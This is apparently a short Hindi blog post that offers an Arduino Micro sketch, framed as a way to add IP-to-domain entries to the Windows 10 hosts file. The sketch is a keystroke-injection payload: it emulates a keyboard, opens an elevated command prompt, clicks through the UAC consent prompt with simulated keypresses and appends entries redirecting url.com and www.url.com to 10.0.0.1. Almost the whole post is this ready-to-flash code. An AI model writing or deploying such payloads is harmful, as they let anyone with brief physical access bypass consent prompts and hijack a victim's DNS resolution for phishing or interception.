Image

रचनात्मक प्रयोगशाला → विंडोज़ 10 में होस्ट मैपिंग में आईपी जोड़ने के लिए स्क्रिप्ट

#Arduino #Windows #स्वचालन #स्क्रिप्ट
प्रकाशन तिथि: 19.05.2024

विंडोज़ 10 में होस्ट मैपिंग में आईपी जोड़ने के लिए स्क्रिप्ट

स्क्रिप्ट Arduino माइक्रो के लिए विंडोज 10 ऑपरेटिंग सिस्टम में आईपी एड्रेस - डोमेन मैपिंग फ़ाइल को संपादित करती है।

#include <Keyboard.h>
#define kbd_es_es

void setup() {
  Keyboard.begin();
}

void loop() {
  delay(5000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(100);
  Keyboard.releaseAll();
  delay(2000);
  Keyboard.print("cmd /Q /D /T:7F /F:OFF /V:ON /K");
  delay(2000);
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_SHIFT);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(3000);
  Keyboard.press(KEY_LEFT_ARROW);
  delay(100);
  Keyboard.releaseAll();
  delay(4000);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  delay(3000);
  Keyboard.println("echo. >> C:\\Windows\\System32\\drivers\\etc\\hosts");
  delay(2000);
  Keyboard.println("echo 10.0.0.1 url.com >> C:\\Windows\\System32\\drivers\\etc\\hosts");
  delay(2000);
  Keyboard.println("echo 10.0.0.1 www.url.com >> C:\\Windows\\System32\\drivers\\etc\\hosts");
  delay(2000);
  Keyboard.println("exit");
  while(1);
}




No Comments Yet